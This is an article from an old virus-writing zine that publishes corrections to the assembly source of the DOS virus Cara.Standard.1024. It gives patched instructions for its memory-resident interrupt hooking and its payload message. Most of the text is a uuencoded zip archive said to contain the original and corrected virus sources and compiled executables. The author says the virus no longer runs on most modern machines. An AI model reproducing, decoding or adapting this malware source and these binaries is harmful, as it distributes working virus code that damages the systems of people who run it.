 
  HEX-FILES No. 4                                                   File 018
 ออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออ 
 
 
    ERRATA: Cara.Standard.1024.A 
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
    Corrections to the source code of Cara.Standard.1024 as it appeared 
    in HEX-FILES No. 1. I would like to state here that the differences 
    were unintentional and typographical in nature.
 
    Newer releases of F-Prot identifies a virus as CARA.1025.B. This 
    virus happens to be the one that appeared as debug script in 
    HEX-FILES No. 1. In addition, when the Cara.Standard.1024 source code 
    listed in HEX-FILES No. 1 is compiled, it would be identified by 
    F-Prot as CARA.1025.unknown? 
 
    There are three bytes that were unintentionally changed from the 
    original virus and the debug script. Also, in the virus listing, 
    there is one line of code that would create problems if compiled. 
    This virus, however, would not be able to execute in almost all 
    computers used today.
 
    The differences with the original are as follows:
 
 
    1. Two bytes were interchanged in the last line of this virus text: 
 
        _0d30   db      10,10,13,'Clandestino',13,10
                db      'Auto-',13,10
                db      'Reproductivo',13,10
                db      'Anti-virus',13,10,1,7,'$'
 
       The placement of 1 and 7 should be interchanged. The last line 
       should read:
 
                db      'Anti-virus',13,10,7,1,'$'
 
 
    2. The next instructions that was changed is in the retention the psp 
       of the first terminating program after the virus has gone 
       resident:
 
                mov     ah,31h
                mov     dx,16h
                push    ax
                push    dx
                push    ds
        _0c38:
 
       The error is the size of memory to be retained. In the original 
       Cara.Standard.1024 the size to be retained is 10 hex or 16 decimal 
       paragraphs. It was erroneously coded as as 16 hex or 22 decimal 
       paragraphs. It, therefore, should read as:
 
                mov     ah,31h
                mov     dx,10h
                ...
 
    3. Another error is present in the source code but not in the 
       accompanying debug script. The error might have crept in when I 
       gave it a once-over prior to packing. If the source is compiled, 
       the resulting virus would be identified by F-Prot as 
       CARA.1025.unknown?
 
       This error would have created problems for the virus. Fortunately, 
       this virus is a goner. The error is as follows:
 
       In the hook of int 20 part, the segment of the virus int handler 
       was placed on an erroneous memory location.
 
                mov     word ptr ds:[(20h*4)],offset _0c11  ;hook int 20
                mov     word ptr ds:[((22h*4)+2)],es
 
       The second line of the above instructions, should be:
 
                mov     word ptr ds:[((20h*4)+2)],es
 
 
    The following is the uuencode script of a zip file containing the 
    source  of the original virus, Cara.Standard.1024.A, and the 
    corrected source of Cara.Standard.1024.B. The compiled version of the 
    source codes are also included inside the zip file. 
 
    I would like to remind you that executing these executables would 
    lead to system hang. If you still have a 8086/8088 or compatible 
    stashed somewhere, you might be able to bring it back to life. 
 
    You would need PKUNZIP.EXE to extract the content of the zip file. If 
    you don't know how to use that program, read its docs.
 
 ฤฤ HF4PACK2.UUE STARTS HERE ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ 

begin 644 hf4pack2.zip
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
/=7)P;W-E<R!O;FQY+@T*
`
end
 
 ฤฤ HF4PACK2.UUE ENDS HERE ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ 
 
 
 
                               -=<{[* HF4 *]}>=-

